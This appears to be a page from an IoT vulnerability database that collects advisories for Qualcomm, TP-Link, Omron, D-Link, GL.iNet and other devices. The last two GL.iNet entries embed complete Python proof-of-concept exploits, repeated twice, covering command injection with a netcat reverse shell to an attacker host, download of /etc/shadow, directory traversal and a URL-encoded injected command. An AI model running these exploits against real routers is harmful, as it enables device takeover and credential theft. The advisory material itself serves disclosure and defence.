VARIoT IoT vulnerabilities database

Improper data length check while processing an event report indication can lead to a buffer overflow in snapdragon mobile and snapdragon wear in versions MDM9206, MDM9607, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 636, SD 835, SDA660, SDM630, SDM660. snapdragon mobile and snapdragon wear Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9206, etc. are the central processing unit (CPU) products of Qualcomm (Qualcomm) applied to different platforms. A buffer error vulnerability exists in several Qualcomm snapdragon products. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements

Improper length check while processing an MQTT message can lead to heap overflow in snapdragon mobile and snapdragon wear in versions MDM9206, MDM9607, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 636, SD 835, SDA660, SDM630, SDM660. snapdragon mobile and snapdragon wear Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9206, etc. are the central processing unit (CPU) products of Qualcomm (Qualcomm) applied to different platforms. A buffer error vulnerability exists in several Qualcomm snapdragon products. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements

TP-Link WDR Series devices through firmware v3 (such as TL-WDR5620 V3.0) are affected by command injection (after login) leading to remote code execution, because shell metacharacters can be included in the weather get_weather_observe citycode field. TP-Link WDR Series device firmware contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWDRSeries is a WDR series wireless router from China TP-LINK. A remote attacker could exploit the vulnerability to execute code

Dell Networking OS10 versions prior to 10.4.3.0 contain a vulnerability in the Phone Home feature which does not properly validate the server's certificate authority during TLS handshake. Use of an invalid or malicious certificate could potentially allow an attacker to spoof a trusted entity by using a man-in-the-middle (MITM) attack. Dell Networking OS10 Contains a certificate validation vulnerability.Information may be obtained and information may be altered. Dell Networking OS10 is a Linux-based network switch operating system developed by Dell

An attacker could inject commands to delete files and/or delete the contents of a file on CX-Supervisor (Versions 3.42 and prior) through a specially crafted project file. Provided by OMRON Corporation CX-Supervisor Contains the following multiple vulnerabilities: * Code injection (CWE-94) - CVE-2018-19011 By processing a specially crafted project file, arbitrary code can be executed with application privileges. * Use After Free ( Use of freed memory ) (CWE-416) - CVE-2018-19017 By processing a specially crafted project file, arbitrary code can be executed with application privileges. * Access of Resource Using Incompatible Type ( Mixing of molds ) (CWE-843) - CVE-2018-19019 By processing a specially crafted project file, arbitrary code can be executed with application privileges. * Access of Uninitialized Pointer ( Uninitialized pointer access ) (CWE-824) - CVE-2018-19018 By processing a specially crafted project file, arbitrary code can be executed with application privileges. * Out-of-bounds Read ( Read out of bounds ) (CWE-125) - CVE-2018-19020 By processing a specially crafted project file, the application reads values outside the array.Service disruption by a third party (DoS) An attacker could be attacked or execute arbitrary code with application privileges. This vulnerability allows remote attackers to delete arbitrary files on vulnerable installations of OMRON CX-Supervisor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of project files. The issue results from the lack of proper validation of a user-supplied string, which could allow the deletion of any file on the system. An attacker could use this to delete data or create a denial-of-service condition. The Omron CX-Supervisor is a powerful and advanced machine visualization package that provides a very flexible PC-based HMI environment. Omron CX-Supervisor is prone to the following security vulnerabilities: 1. A code-injection vulnerability 2. Multiple command-injection vulnerability 3. Omron CX-Supervisor 3.42 and prior versions are vulnerable. Omron CX-Supervisor is a visual machine controller produced by Omron Corporation of Japan. A command injection vulnerability exists in Omron CX-Supervisor 3.42 and earlier versions

An attacker could inject commands to launch programs and create, write, and read files on CX-Supervisor (Versions 3.42 and prior) through a specially crafted project file. An attacker could exploit this to execute code under the privileges of the application. Provided by OMRON Corporation CX-Supervisor Contains the following multiple vulnerabilities: * Code injection (CWE-94) - CVE-2018-19011 By processing a specially crafted project file, arbitrary code can be executed with application privileges. * Use After Free ( Use of freed memory ) (CWE-416) - CVE-2018-19017 By processing a specially crafted project file, arbitrary code can be executed with application privileges. * Access of Resource Using Incompatible Type ( Mixing of molds ) (CWE-843) - CVE-2018-19019 By processing a specially crafted project file, arbitrary code can be executed with application privileges. * Access of Uninitialized Pointer ( Uninitialized pointer access ) (CWE-824) - CVE-2018-19018 By processing a specially crafted project file, arbitrary code can be executed with application privileges. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of OMRON CX-Supervisor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of project files. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. The Omron CX-Supervisor is a powerful and advanced machine visualization package that provides a very flexible PC-based HMI environment. Code. Omron CX-Supervisor is prone to the following security vulnerabilities: 1. A code-injection vulnerability 2. Multiple command-injection vulnerability 3. Omron CX-Supervisor 3.42 and prior versions are vulnerable. Omron CX-Supervisor is a visual machine controller produced by Omron Corporation of Japan. A command injection vulnerability exists in Omron CX-Supervisor 3.42 and earlier versions

A type confusion vulnerability exists when processing project files in CX-Supervisor (Versions 3.42 and prior). An attacker could use a specially crafted project file to exploit and execute code under the privileges of the application. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of OMRON CX-Supervisor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of SCS files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. The Omron CX-Supervisor is a powerful and advanced machine visualization package that provides a very flexible PC-based HMI environment. Omron CX-Supervisor is prone to the following security vulnerabilities: 1. A code-injection vulnerability 2. Multiple command-injection vulnerability 3. Omron CX-Supervisor 3.42 and prior versions are vulnerable. Omron CX-Supervisor is a visual machine controller produced by Omron Corporation of Japan

Several use after free vulnerabilities have been identified in CX-Supervisor (Versions 3.42 and prior). When processing project files, the application fails to check if it is referencing freed memory. An attacker could use a specially crafted project file to exploit and execute code under the privileges of the application. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of OMRON CX-Supervisor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of project files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. The Omron CX-Supervisor is a powerful and advanced machine visualization package that provides a very flexible PC-based HMI environment. Program permission execution code. Omron CX-Supervisor is prone to the following security vulnerabilities: 1. A code-injection vulnerability 2. Multiple command-injection vulnerability 3. Omron CX-Supervisor is a visual machine controller produced by Omron Corporation of Japan

A Denial of Service (DOS) issue was discovered in ControlByWeb X-320M-I Web-Enabled Instrumentation-Grade Data Acquisition module 1.05 with firmware revision v1.05. An authenticated user can configure invalid network settings, stopping TCP based communications to the device. A physical factory reset is required to restore the device to an operational state. ControlByWeb X-320M-I Contains vulnerabilities related to security features.Service operation interruption (DoS) There is a possibility of being put into a state. ControlByWeb X-320M is prone to a cross-site scripting vulnerability and an authentication-bypass vulnerability. Attackers can exploit these issues to execute arbitrary code in the context of the browser, obtain sensitive information, or cause a denial-of-service attack; other attacks may also be possible. X-320M-I firmware revision v1.05 and prior are vulnerable. Xytronix Research & Design ControlByWeb X-320M is a network-enabled weather station controller from Xytronix Research & Design, USA. The product supports remote viewing of the current wind speed, wind direction, precipitation, temperature, humidity, solar radiation and air pressure, etc. A security feature issue vulnerability exists in the Xytronix Research & Design ControlByWeb X-320M. An attacker could exploit this vulnerability to cause a denial of service

A stored cross-site scripting (XSS) issue was discovered in ControlByWeb X-320M-I Web-Enabled Instrumentation-Grade Data Acquisition module 1.05 with firmware revision v1.05. An authenticated user can inject arbitrary script via setup.html in the web interface. ControlByWeb X-320M-I Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ControlByWeb X-320M is prone to a cross-site scripting vulnerability and an authentication-bypass vulnerability. Attackers can exploit these issues to execute arbitrary code in the context of the browser, obtain sensitive information, or cause a denial-of-service attack; other attacks may also be possible. X-320M-I firmware revision v1.05 and prior are vulnerable. Xytronix Research & Design ControlByWeb X-320M is a network-enabled weather station controller from Xytronix Research & Design, USA. The product supports remote viewing of the current wind speed, wind direction, precipitation, temperature, humidity, solar radiation and air pressure, etc. A cross-site scripting vulnerability exists in the Xytronix Research & Design ControlByWeb X-320M due to the program not validating input properly. A remote attacker could exploit this vulnerability to execute code

The TextEditor 2.0 in ABB CP400 Panel Builder versions 2.0.7.05 and earlier contain a vulnerability in the file parser of the Text Editor wherein the application doesn't properly prevent the insertion of specially crafted files which could allow arbitrary code execution. ABB CP400 Panel Builder Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ABB CP400PB is a set of human interface programming software from ABB, Switzerland. TextEditor is one of the text editors. An attacker could exploit the vulnerability to execute arbitrary code and cause a denial of service. ABB CP400 Panel Builder TextEditor is prone to a local code-execution vulnerability. Failed exploit attempts may cause a denial-of-service condition. The following products are vulnerable: CP400 Panel BuilderTextEditor 2.0 CP400PB 2.0.7.05 and prior

Shenzhen Ruilian Digital Technology Co., Ltd. is committed to developing leading Internet video products and video content services, providing cameras for security, sports, entertainment, nursing and other subdivision applications for the consumer market, and providing live broadcast, video sharing and Content services such as video cloud storage. The Reolink camera has a remote command execution vulnerability and two unauthorized stack overflow vulnerabilities. An attacker could use a remote command execution vulnerability in conjunction with the default credentials admin: empty or weak passwords to bypass the authentication limit and remotely take over the camera.

D-LINK Central WifiManager CWM-100 is D-LINK centralized wireless management software. The D-link Central WifiManager Co ***. Php page has a SQL injection vulnerability. Attackers can use the vulnerability to obtain database information and modify and delete arbitrary data in the database.

D-LINK Central WifiManager CWM-100 is D-LINK centralized wireless management software. D-Link Central WiFiManager has a code execution vulnerability in its implementation. An attacker could use this vulnerability to gain control of a web server.

D-Link Central WiFiManager is D-Link's centralized wireless management software. The D-link Central WifiManager Ra ***. Php page has a SQL injection vulnerability. An attacker can use the vulnerability to obtain sensitive database information.

There is a race condition vulnerability on Huawei Honor V10 smartphones versions earlier than Berkeley-AL20 9.0.0.156(C00E156R2P14T8), Honor 10 smartphones versions earlier than Columbia-AL10B 9.0.0.156(C00E156R1P20T8) and Honor Play smartphones versions earlier than Cornell-AL00A 9.0.0.156(C00E156R1P13T8). An attacker tricks the user into installing a malicious application, which makes multiple processes to operate the same variate at the same time. Successful exploit could cause execution of malicious code. HuaweiHonorV10, 10 and Play are all Huawei smartphone products of China

An issue was discovered on Shenzhen Coship RT3050 4.0.0.40, RT3052 4.0.0.48, RT7620 10.0.0.49, WM3300 5.0.0.54, and WM3300 5.0.0.55 devices. The password reset functionality of the router doesn't have backend validation for the current password and doesn't require any type of authentication. By making a POST request to the apply.cgi file of the router, the attacker can change the admin username and password of the router. plural Shenzhen Coship Vulnerabilities related to certificate and password management exist in device products.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Coship Wireless Router is a wireless router produced by China Coship Electronics Company. A security vulnerability exists in the Coship Wireless Router. An attacker could use this vulnerability to reset the administrator password. The following versions are affected: Coship Wireless Router Version 4.0.0.48, Version 4.0.0.40, Version 5.0.0.54, Version 5.0.0.55, Version 10.0.0.49

CX-Supervisor (Versions 3.42 and prior) can execute code that has been injected into a project file. An attacker could exploit this to execute code under the privileges of the application. Provided by OMRON Corporation CX-Supervisor Contains the following multiple vulnerabilities: * Code injection (CWE-94) - CVE-2018-19011 By processing a specially crafted project file, arbitrary code can be executed with application privileges. * Command injection (CWE-77) - CVE-2018-19013 By processing a specially crafted project file, files on the device and their contents are deleted. * Command injection (CWE-77) - CVE-2018-19015 By processing a specially crafted project file, the program is executed with the authority of the application, and a file on the device is created, written and read. * Use After Free ( Use of freed memory ) (CWE-416) - CVE-2018-19017 By processing a specially crafted project file, arbitrary code can be executed with application privileges. * Access of Resource Using Incompatible Type ( Mixing of molds ) (CWE-843) - CVE-2018-19019 By processing a specially crafted project file, arbitrary code can be executed with application privileges. * Access of Uninitialized Pointer ( Uninitialized pointer access ) (CWE-824) - CVE-2018-19018 By processing a specially crafted project file, arbitrary code can be executed with application privileges. * Out-of-bounds Read ( Read out of bounds ) (CWE-125) - CVE-2018-19020 By processing a specially crafted project file, the application reads values outside the array.Service disruption by a third party (DoS) An attacker could be attacked or execute arbitrary code with application privileges. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of OMRON CX-Supervisor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of project files. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. The Omron CX-Supervisor is a powerful and advanced machine visualization package that provides a very flexible PC-based HMI environment. Omron CX-Supervisor is prone to the following security vulnerabilities: 1. A code-injection vulnerability 2. Multiple command-injection vulnerability 3. Omron CX-Supervisor 3.42 and prior versions are vulnerable. Omron CX-Supervisor is a visual machine controller produced by Omron Corporation of Japan

Command injection vulnerability in login_cgi in GL.iNet GL-AR300M-Lite devices with firmware 2.27 allows remote attackers to execute arbitrary code. GL.iNet GL-AR300M-Lite The device firmware contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. GL-AR300M-Lite is a smart wireless router. A command injection vulnerability exists in GL-AR300M-Lite version 2.27. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. # Exploit Title: GL-AR300M-Lite Authenticated Command injection - Arbitrary file download - Directory Traversal # Date: 15/1/2019 # Exploit Author: Pasquale Turi aka boombyte # Vendor Homepage: https://www.gl-inet.com/ # Software Link: https://www.gl-inet.com/products/gl-ar300m/ # Version: Firmware version 2.27 # CVE : CVE-2019-6272 - CVE-2019-6273 - CVE-2019-6274 - CVE-2019-6275 #CVE-2019-6272 PoC (Command injection): import requests rhost='RHOST' lhost='LHOST' lport ='LPORT' password='PASSWORD' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r3.cookies,data={'action':'settimezone','timezone':'`nc '+lhost+' '+lport+' -e /bin/ash`'}) #CVE-2019-6273 (Arbitrary file download) PoC: import requests rhost='RHOST' password='PASSWORD' file_path='/etc/shadow' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.get('http://'+rhost+'/cgi-bin/download_file?/mnt/..'+file_path,headers=header,cookies=r3.cookies) print r4.text #CVE-2019-6274 (Path Trasversal) PoC: import requests rhost='RHOST' password='PASSWORD' path='/' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.get('http://'+rhost+'/cgi-bin/storage_cgi?id=2&pwd='+path,headers=header,cookies=r3.cookies) print r4.text #CVE-2019-6275 (Another command injection): import requests rhost='RHOST' lhost='LHOST' lport ='LPORT' password='PASSWORD' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.post('http://'+rhost+'/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153 ',headers=header,cookies=r3.cookies,) print r4.text

Directory traversal vulnerability in storage_cgi in GL.iNet GL-AR300M-Lite devices with firmware 2.27 allows remote attackers to have unspecified impact via directory traversal sequences. GL.iNet GL-AR300M-Lite The device firmware contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. GL-AR300M-Lite is a smart wireless router. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. # Exploit Title: GL-AR300M-Lite Authenticated Command injection - Arbitrary file download - Directory Traversal # Date: 15/1/2019 # Exploit Author: Pasquale Turi aka boombyte # Vendor Homepage: https://www.gl-inet.com/ # Software Link: https://www.gl-inet.com/products/gl-ar300m/ # Version: Firmware version 2.27 # CVE : CVE-2019-6272 - CVE-2019-6273 - CVE-2019-6274 - CVE-2019-6275 #CVE-2019-6272 PoC (Command injection): import requests rhost='RHOST' lhost='LHOST' lport ='LPORT' password='PASSWORD' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r3.cookies,data={'action':'settimezone','timezone':'`nc '+lhost+' '+lport+' -e /bin/ash`'}) #CVE-2019-6273 (Arbitrary file download) PoC: import requests rhost='RHOST' password='PASSWORD' file_path='/etc/shadow' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.get('http://'+rhost+'/cgi-bin/download_file?/mnt/..'+file_path,headers=header,cookies=r3.cookies) print r4.text #CVE-2019-6274 (Path Trasversal) PoC: import requests rhost='RHOST' password='PASSWORD' path='/' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.get('http://'+rhost+'/cgi-bin/storage_cgi?id=2&pwd='+path,headers=header,cookies=r3.cookies) print r4.text #CVE-2019-6275 (Another command injection): import requests rhost='RHOST' lhost='LHOST' lport ='LPORT' password='PASSWORD' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.post('http://'+rhost+'/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153 ',headers=header,cookies=r3.cookies,) print r4.text